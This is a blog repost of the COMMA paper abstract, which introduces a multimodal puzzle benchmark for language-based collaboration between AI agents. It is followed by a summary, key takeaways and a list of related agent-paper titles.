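The attack scenarios feature adversaries posing as recruiters, funding agencies, and journalists to extract sensitive information.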

COMMA: A Communicative Multimodal Multi-Agent Benchmark

Authors:Timothy Ossowski, Jixuan Chen, Danyal Maqbool, Zefan Cai, Tyler Bradshaw, Junjie Hu

The rapid advances of multimodal agents built on large foundation models have largely overlooked their potential for language-based communication between agents in collaborative tasks. This oversight presents a critical gap in understanding their effectiveness in real-world deployments, particularly when communicating with humans. Existing agentic benchmarks fail to address key aspects of inter-agent communication and collaboration, particularly in scenarios where agents have unequal access to information and must work together to achieve tasks beyond the scope of individual capabilities. To fill this gap, we introduce COMMA: a novel puzzle benchmark designed to evaluate the collaborative performance of multimodal multi-agent systems through language communication. Our benchmark features a variety of multimodal puzzles, providing a comprehensive evaluation across four key categories of agentic capability in a communicative collaboration setting. Our findings reveal surprising weaknesses in state-of-the-art models, including strong proprietary models like GPT-4o and reasoning models like o4-mini. Many chain of thought reasoning models such as R1-Onevision and LLaVA-CoT struggle to outperform even a random baseline in agent-agent collaboration, indicating a potential growth area in their communication abilities.

Paper and project links

PDF

Summary

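Rapid advances in multimodal agents built on large foundation models have largely overlooked their potential for language-based communication between agents in collaborative tasks. This leaves a critical gap in understanding how effective they are in real-world deployments, particularly when communicating with humans. Existing agentic benchmarks do not address key aspects of inter-agent communication and collaboration, especially when agents have unequal access to information and must work together on tasks beyond any single agent's capabilities. To fill this gap, the authors introduce COMMA, a puzzle benchmark that evaluates the collaborative performance of multimodal multi-agent systems through language communication. It features a variety of multimodal puzzles and covers four key categories of agentic capability in a communicative collaboration setting. The findings reveal surprising weaknesses in state-of-the-art models, including strong proprietary models such as GPT-4o and reasoning models such as o4-mini. Many chain-of-thought reasoning models, such as R1-Onevision and LLaVA-CoT, struggle to outperform even a random baseline in agent-agent collaboration, which points to room for growth in their communication abilities.

Key Takeaways

The potential of multimodal agents for language-based communication in collaborative tasks has been largely overlooked.
Existing agentic benchmarks do not adequately evaluate key aspects of inter-agent communication and collaboration.
COMMA is introduced to evaluate how well multimodal multi-agent systems collaborate through language communication.
COMMA contains a variety of multimodal puzzles and evaluates four key categories of agentic capability.
State-of-the-art models, including GPT-4o and reasoning models such as o4-mini, show weaknesses in agent collaboration.
Chain-of-thought reasoning models such as R1-Onevision and LLaVA-CoT struggle to outperform a random baseline in agent-agent collaboration.
Communication ability matters for the real-world deployment and effectiveness of multimodal agent systems.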

Kedreamix

https://kedreamix.github.io/Talk2Paper/Paper/2025-09-11/Agent/

Unless otherwise stated, all articles on this blog are licensed under CC BY 4.0. Please credit Kedreamix when reposting.

Agent

Updated 2025-09-11

AgentSentinel: An End-to-End and Real-Time Security Defense Framework for Computer-Use Agents

CAViAR: Critic-Augmented Video Agentic Reasoning

AgentX: Towards Orchestrating Robust Agentic Workflow Patterns with FaaS-hosted MCP Services

Towards Generalized Routing: Model and Agent Orchestration for Adaptive and Efficient Inference

VeriOS: Query-Driven Proactive Human-Agent-GUI Interaction for Trustworthy OS Agents

T-araVLN: Translator for Agricultural Robotic Agents on Vision-and-Language Navigation

SFR-DeepResearch: Towards Effective Reinforcement Learning for Autonomously Reasoning Single Agents

EvoEmo: Towards Evolved Emotional Policies for LLM Agents in Multi-Turn Negotiation

AI-SearchPlanner: Modular Agentic Search via Pareto-Optimal Multi-Objective Reinforcement Learning

Personalized Attacks of Social Engineering in Multi-turn Conversations: LLM Agents for Simulation and Detection

COMMA: A Communicative Multimodal Multi-Agent Benchmark